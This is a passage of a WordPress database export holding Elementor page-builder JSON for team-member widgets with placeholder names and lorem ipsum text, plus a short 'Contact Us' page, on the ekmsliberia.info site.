,\"container_background_slideshow_gallery\":[],\"overlay_background_image\":{\"url\":\"\",\"id\":\"\"},\"overlay_background_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"overlay_background_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"overlay_background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"overlay_background_slideshow_gallery\":[],\"_background_image\":{\"url\":\"\",\"id\":\"\"},\"_background_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"_background_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"_background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"_background_slideshow_gallery\":[],\"_background_hover_image\":{\"url\":\"\",\"id\":\"\"},\"_background_hover_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"_background_hover_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"_background_hover_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"_background_hover_slideshow_gallery\":[]},\"elements\":[],\"widgetType\":\"jet-team-member\"}],\"isInner\":false},{\"id\":\"29325d60\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7cf8d6a3\",\"elType\":\"widget\",\"settings\":{\"member_image\":{\"id\":2301,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/team-14.jpg\"},\"member_first_name\":\"Mary\",\"member_last_name\":\"Scott\",\"member_position\":\"Founder & CEO\",\"member_description\":\"Lorem ipsum dolor sit amet conse ctetur adipisicing elit, sed do eiusmod tempor incididunt.\",\"social_list\":[{\"social_icon\":\"\",\"social_label\":\"\",\"social_link\":\"\",\"label_visible\":\"false\",\"_id\":\"fmh0jib\",\"selected_social_icon\":{\"value\":\"\",\"library\":\"\"}}],\"button_text\":\"Learn more\",\"first_name_typography_typography\":\"custom\",\"first_name_typography_font_size\":{\"unit\":\"px\",\"size\":20},\"first_name_typography_font_family\":\"Oswald\",\"first_name_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"last_name_typography_typography\":\"custom\",\"last_name_typography_font_size\":{\"unit\":\"px\",\"size\":20},\"last_name_typography_font_family\":\"Oswald\",\"name_margin\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"name_text_alignment\":\"left\",\"position_color\":\"#23ccc3\",\"position_typography_typography\":\"custom\",\"position_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"position_typography_font_family\":\"Roboto Condensed\",\"position_typography_font_style\":\"italic\",\"position_margin\":{\"unit\":\"px\",\"top\":\"4\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"position_alignment\":\"flex-start\",\"position_text_alignment\":\"right\",\"desc_color\":\"#777777\",\"desc_typography_typography\":\"custom\",\"desc_typography_font_size\":{\"unit\":\"px\",\"size\":16},\"desc_typography_font_family\":\"Roboto Condensed\",\"desc_typography_font_weight\":\"400\",\"desc_margin\":{\"unit\":\"px\",\"top\":\"8\",\"right\":\"0\",\"bottom\":\"3\",\"left\":\"0\",\"isLinked\":false},\"desc_text_alignment\":\"left\",\"button_alignment\":\"flex-start\",\"button_bg_color\":\"#23ccc3\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"button_typography_font_family\":\"Oswald\",\"button_typography_font_weight\":\"700\",\"button_typography_text_transform\":\"uppercase\",\"button_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"button_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"30\",\"bottom\":\"19\",\"left\":\"30\",\"isLinked\":false},\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"primary_button_hover_bg_color\":\"#333333\",\"last_name_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"container_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"container_background_image\":{\"url\":\"\",\"id\":\"\"},\"container_background_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"container_background_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"container_background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"container_background_slideshow_gallery\":[],\"overlay_background_image\":{\"url\":\"\",\"id\":\"\"},\"overlay_background_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"overlay_background_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"overlay_background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"overlay_background_slideshow_gallery\":[],\"_background_image\":{\"url\":\"\",\"id\":\"\"},\"_background_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"_background_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"_background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"_background_slideshow_gallery\":[],\"_background_hover_image\":{\"url\":\"\",\"id\":\"\"},\"_background_hover_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"_background_hover_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"_background_hover_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"_background_hover_slideshow_gallery\":[]},\"elements\":[],\"widgetType\":\"jet-team-member\"}],\"isInner\":false},{\"id\":\"5ac7adf5\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7fc35fde\",\"elType\":\"widget\",\"settings\":{\"member_image\":{\"id\":2302,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/team-15.jpg\"},\"member_first_name\":\"David\",\"member_last_name\":\"Anderson\",\"member_position\":\"Founder & CEO\",\"member_description\":\"Lorem ipsum dolor sit amet conse ctetur adipisicing elit, sed do eiusmod tempor incididunt.\",\"social_list\":[{\"social_icon\":\"\",\"social_label\":\"\",\"social_link\":\"\",\"label_visible\":\"false\",\"_id\":\"fmh0jib\",\"selected_social_icon\":{\"value\":\"\",\"library\":\"\"}}],\"button_text\":\"Learn more\",\"first_name_typography_typography\":\"custom\",\"first_name_typography_font_size\":{\"unit\":\"px\",\"size\":20},\"first_name_typography_font_family\":\"Oswald\",\"first_name_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"last_name_typography_typography\":\"custom\",\"last_name_typography_font_size\":{\"unit\":\"px\",\"size\":20},\"last_name_typography_font_family\":\"Oswald\",\"name_margin\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"name_text_alignment\":\"left\",\"position_color\":\"#23ccc3\",\"position_typography_typography\":\"custom\",\"position_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"position_typography_font_family\":\"Roboto Condensed\",\"position_typography_font_style\":\"italic\",\"position_margin\":{\"unit\":\"px\",\"top\":\"4\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"position_alignment\":\"flex-start\",\"position_text_alignment\":\"right\",\"desc_color\":\"#777777\",\"desc_typography_typography\":\"custom\",\"desc_typography_font_size\":{\"unit\":\"px\",\"size\":16},\"desc_typography_font_family\":\"Roboto Condensed\",\"desc_typography_font_weight\":\"400\",\"desc_margin\":{\"unit\":\"px\",\"top\":\"8\",\"right\":\"0\",\"bottom\":\"3\",\"left\":\"0\",\"isLinked\":false},\"desc_text_alignment\":\"left\",\"button_alignment\":\"left\",\"button_bg_color\":\"#23ccc3\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"button_typography_font_family\":\"Oswald\",\"button_typography_font_weight\":\"700\",\"button_typography_text_transform\":\"uppercase\",\"button_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"button_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"30\",\"bottom\":\"19\",\"left\":\"30\",\"isLinked\":false},\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"primary_button_hover_bg_color\":\"#333333\",\"last_name_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"container_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"container_background_image\":{\"url\":\"\",\"id\":\"\"},\"container_background_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"container_background_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"container_background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"container_background_slideshow_gallery\":[],\"overlay_background_image\":{\"url\":\"\",\"id\":\"\"},\"overlay_background_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"overlay_background_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"overlay_background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"overlay_background_slideshow_gallery\":[],\"_background_image\":{\"url\":\"\",\"id\":\"\"},\"_background_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"_background_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"_background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"_background_slideshow_gallery\":[],\"_background_hover_image\":{\"url\":\"\",\"id\":\"\"},\"_background_hover_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"_background_hover_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"_background_hover_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"_background_hover_slideshow_gallery\":[]},\"elements\":[],\"widgetType\":\"jet-team-member\"}],\"isInner\":false},{\"id\":\"b70c70a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"44e5b7f1\",\"elType\":\"widget\",\"settings\":{\"member_image\":{\"id\":2303,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/team-16.jpg\"},\"member_first_name\":\"Tom\",\"member_last_name\":\"Allen\",\"member_position\":\"Founder & CEO\",\"member_description\":\"Lorem ipsum dolor sit amet conse ctetur adipisicing elit, sed do eiusmod tempor incididunt.\",\"social_list\":[{\"social_icon\":\"\",\"social_label\":\"\",\"social_link\":\"\",\"label_visible\":\"false\",\"_id\":\"fmh0jib\",\"selected_social_icon\":{\"value\":\"\",\"library\":\"\"}}],\"button_text\":\"Learn more\",\"first_name_typography_typography\":\"custom\",\"first_name_typography_font_size\":{\"unit\":\"px\",\"size\":20},\"first_name_typography_font_family\":\"Oswald\",\"first_name_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"last_name_typography_typography\":\"custom\",\"last_name_typography_font_size\":{\"unit\":\"px\",\"size\":20},\"last_name_typography_font_family\":\"Oswald\",\"name_margin\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"name_text_alignment\":\"left\",\"position_color\":\"#23ccc3\",\"position_typography_typography\":\"custom\",\"position_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"position_typography_font_family\":\"Roboto Condensed\",\"position_typography_font_style\":\"italic\",\"position_margin\":{\"unit\":\"px\",\"top\":\"4\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"position_alignment\":\"flex-start\",\"position_text_alignment\":\"right\",\"desc_color\":\"#777777\",\"desc_typography_typography\":\"custom\",\"desc_typography_font_size\":{\"unit\":\"px\",\"size\":16},\"desc_typography_font_family\":\"Roboto Condensed\",\"desc_typography_font_weight\":\"400\",\"desc_margin\":{\"unit\":\"px\",\"top\":\"8\",\"right\":\"0\",\"bottom\":\"3\",\"left\":\"0\",\"isLinked\":false},\"desc_text_alignment\":\"left\",\"button_alignment\":\"left\",\"button_bg_color\":\"#23ccc3\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"button_typography_font_family\":\"Oswald\",\"button_typography_font_weight\":\"700\",\"button_typography_text_transform\":\"uppercase\",\"button_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"button_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"30\",\"bottom\":\"19\",\"left\":\"30\",\"isLinked\":false},\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"primary_button_hover_bg_color\":\"#333333\",\"last_name_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"container_background_image\":{\"url\":\"\",\"id\":\"\"},\"container_background_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"container_background_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"container_background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"container_background_slideshow_gallery\":[],\"overlay_background_image\":{\"url\":\"\",\"id\":\"\"},\"overlay_background_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"overlay_background_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"overlay_background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"overlay_background_slideshow_gallery\":[],\"_background_image\":{\"url\":\"\",\"id\":\"\"},\"_background_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"_background_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"_background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"_background_slideshow_gallery\":[],\"_background_hover_image\":{\"url\":\"\",\"id\":\"\"},\"_background_hover_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"_background_hover_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"_background_hover_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"_background_hover_slideshow_gallery\":[]},\"elements\":[],\"widgetType\":\"jet-team-member\"}],\"isInner\":false}],\"isInner\":false}]'),(14538,2306,'_elementor_edit_mode','builder'),(14539,2306,'_elementor_template_type','wp-page'),(14540,2306,'_elementor_version','2.7.5'),(14541,2306,'_wp_page_template','default'),(14542,2306,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk.<\\/a>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4d9704de\",\"elType\":\"section\",\"settings\":{\"gap\":\"extended\",\"structure\":\"40\",\"padding\":{\"unit\":\"px\",\"top\":\"105\",\"right\":\"0\",\"bottom\":\"85\",\"left\":\"0\",\"isLinked\":false},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"_id\":\"997f017\"}]},\"elements\":[{\"id\":\"75f1af0a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"1eb2394d\",\"elType\":\"widget\",\"settings\":{\"member_image\":{\"id\":2300,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/team-13.jpg\"},\"member_first_name\":\"John\",\"member_last_name\":\"Borthwick\",\"member_position\":\"Founder & CEO\",\"member_description\":\"Lorem ipsum dolor sit amet conse ctetur adipisicing elit, sed do eiusmod tempor incididunt.\",\"social_list\":[{\"social_icon\":\"\",\"social_label\":\"\",\"social_link\":\"\",\"label_visible\":\"false\",\"_id\":\"fmh0jib\",\"selected_social_icon\":{\"value\":\"\",\"library\":\"\"}}],\"button_text\":\"Learn more\",\"first_name_typography_typography\":\"custom\",\"first_name_typography_font_size\":{\"unit\":\"px\",\"size\":20},\"first_name_typography_font_family\":\"Oswald\",\"first_name_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"last_name_typography_typography\":\"custom\",\"last_name_typography_font_size\":{\"unit\":\"px\",\"size\":20},\"last_name_typography_font_family\":\"Oswald\",\"name_margin\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"name_text_alignment\":\"left\",\"position_color\":\"#23ccc3\",\"position_typography_typography\":\"custom\",\"position_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"position_typography_font_family\":\"Roboto Condensed\",\"position_typography_font_style\":\"italic\",\"position_margin\":{\"unit\":\"px\",\"top\":\"4\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"position_alignment\":\"flex-start\",\"position_text_alignment\":\"right\",\"desc_color\":\"#777777\",\"desc_typography_typography\":\"custom\",\"desc_typography_font_size\":{\"unit\":\"px\",\"size\":16},\"desc_typography_font_family\":\"Roboto Condensed\",\"desc_typography_font_weight\":\"400\",\"desc_margin\":{\"unit\":\"px\",\"top\":\"8\",\"right\":\"0\",\"bottom\":\"3\",\"left\":\"0\",\"isLinked\":false},\"desc_text_alignment\":\"left\",\"button_alignment\":\"flex-start\",\"button_bg_color\":\"#23ccc3\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"button_typography_font_family\":\"Oswald\",\"button_typography_font_weight\":\"700\",\"button_typography_text_transform\":\"uppercase\",\"button_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"button_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"30\",\"bottom\":\"19\",\"left\":\"30\",\"isLinked\":false},\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"primary_button_hover_bg_color\":\"#333333\",\"last_name_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"container_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"container_background_image\":{\"url\":\"\",\"id\":\"\"},\"container_background_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"container_background_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"container_background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"container_background_slideshow_gallery\":[],\"overlay_background_image\":{\"url\":\"\",\"id\":\"\"},\"overlay_background_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"overlay_background_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"overlay_background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"overlay_background_slideshow_gallery\":[],\"_background_image\":{\"url\":\"\",\"id\":\"\"},\"_background_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"_background_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"_background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"_background_slideshow_gallery\":[],\"_background_hover_image\":{\"url\":\"\",\"id\":\"\"},\"_background_hover_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"_background_hover_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"_background_hover_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"_background_hover_slideshow_gallery\":[]},\"elements\":[],\"widgetType\":\"jet-team-member\"}],\"isInner\":false},{\"id\":\"29325d60\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7cf8d6a3\",\"elType\":\"widget\",\"settings\":{\"member_image\":{\"id\":2301,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/team-14.jpg\"},\"member_first_name\":\"Mary\",\"member_last_name\":\"Scott\",\"member_position\":\"Founder & CEO\",\"member_description\":\"Lorem ipsum dolor sit amet conse ctetur adipisicing elit, sed do eiusmod tempor incididunt.\",\"social_list\":[{\"social_icon\":\"\",\"social_label\":\"\",\"social_link\":\"\",\"label_visible\":\"false\",\"_id\":\"fmh0jib\",\"selected_social_icon\":{\"value\":\"\",\"library\":\"\"}}],\"button_text\":\"Learn more\",\"first_name_typography_typography\":\"custom\",\"first_name_typography_font_size\":{\"unit\":\"px\",\"size\":20},\"first_name_typography_font_family\":\"Oswald\",\"first_name_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"last_name_typography_typography\":\"custom\",\"last_name_typography_font_size\":{\"unit\":\"px\",\"size\":20},\"last_name_typography_font_family\":\"Oswald\",\"name_margin\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"name_text_alignment\":\"left\",\"position_color\":\"#23ccc3\",\"position_typography_typography\":\"custom\",\"position_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"position_typography_font_family\":\"Roboto Condensed\",\"position_typography_font_style\":\"italic\",\"position_margin\":{\"unit\":\"px\",\"top\":\"4\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"position_alignment\":\"flex-start\",\"position_text_alignment\":\"right\",\"desc_color\":\"#777777\",\"desc_typography_typography\":\"custom\",\"desc_typography_font_size\":{\"unit\":\"px\",\"size\":16},\"desc_typography_font_family\":\"Roboto Condensed\",\"desc_typography_font_weight\":\"400\",\"desc_margin\":{\"unit\":\"px\",\"top\":\"8\",\"right\":\"0\",\"bottom\":\"3\",\"left\":\"0\",\"isLinked\":false},\"desc_text_alignment\":\"left\",\"button_alignment\":\"flex-start\",\"button_bg_color\":\"#23ccc3\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"button_typography_font_family\":\"Oswald\",\"button_typography_font_weight\":\"700\",\"button_typography_text_transform\":\"uppercase\",\"button_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"button_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"30\",\"bottom\":\"19\",\"left\":\"30\",\"isLinked\":false},\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"primary_button_hover_bg_color\":\"#333333\",\"last_name_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"container_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"container_background_image\":{\"url\":\"\",\"id\":\"\"},\"container_background_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"container_background_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"container_background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"container_background_slideshow_gallery\":[],\"overlay_background_image\":{\"url\":\"\",\"id\":\"\"},\"overlay_background_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"overlay_background_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"overlay_background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"overlay_background_slideshow_gallery\":[],\"_background_image\":{\"url\":\"\",\"id\":\"\"},\"_background_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"_background_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"_background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"_background_slideshow_gallery\":[],\"_background_hover_image\":{\"url\":\"\",\"id\":\"\"},\"_background_hover_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"_background_hover_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"_background_hover_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"_background_hover_slideshow_gallery\":[]},\"elements\":[],\"widgetType\":\"jet-team-member\"}],\"isInner\":false},{\"id\":\"5ac7adf5\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7fc35fde\",\"elType\":\"widget\",\"settings\":{\"member_image\":{\"id\":2302,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/team-15.jpg\"},\"member_first_name\":\"David\",\"member_last_name\":\"Anderson\",\"member_position\":\"Founder & CEO\",\"member_description\":\"Lorem ipsum dolor sit amet conse ctetur adipisicing elit, sed do eiusmod tempor incididunt.\",\"social_list\":[{\"social_icon\":\"\",\"social_label\":\"\",\"social_link\":\"\",\"label_visible\":\"false\",\"_id\":\"fmh0jib\",\"selected_social_icon\":{\"value\":\"\",\"library\":\"\"}}],\"button_text\":\"Learn more\",\"first_name_typography_typography\":\"custom\",\"first_name_typography_font_size\":{\"unit\":\"px\",\"size\":20},\"first_name_typography_font_family\":\"Oswald\",\"first_name_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"last_name_typography_typography\":\"custom\",\"last_name_typography_font_size\":{\"unit\":\"px\",\"size\":20},\"last_name_typography_font_family\":\"Oswald\",\"name_margin\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"name_text_alignment\":\"left\",\"position_color\":\"#23ccc3\",\"position_typography_typography\":\"custom\",\"position_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"position_typography_font_family\":\"Roboto Condensed\",\"position_typography_font_style\":\"italic\",\"position_margin\":{\"unit\":\"px\",\"top\":\"4\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"position_alignment\":\"flex-start\",\"position_text_alignment\":\"right\",\"desc_color\":\"#777777\",\"desc_typography_typography\":\"custom\",\"desc_typography_font_size\":{\"unit\":\"px\",\"size\":16},\"desc_typography_font_family\":\"Roboto Condensed\",\"desc_typography_font_weight\":\"400\",\"desc_margin\":{\"unit\":\"px\",\"top\":\"8\",\"right\":\"0\",\"bottom\":\"3\",\"left\":\"0\",\"isLinked\":false},\"desc_text_alignment\":\"left\",\"button_alignment\":\"left\",\"button_bg_color\":\"#23ccc3\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"button_typography_font_family\":\"Oswald\",\"button_typography_font_weight\":\"700\",\"button_typography_text_transform\":\"uppercase\",\"button_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"button_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"30\",\"bottom\":\"19\",\"left\":\"30\",\"isLinked\":false},\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"primary_button_hover_bg_color\":\"#333333\",\"last_name_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"container_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"container_background_image\":{\"url\":\"\",\"id\":\"\"},\"container_background_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"container_background_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"container_background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"container_background_slideshow_gallery\":[],\"overlay_background_image\"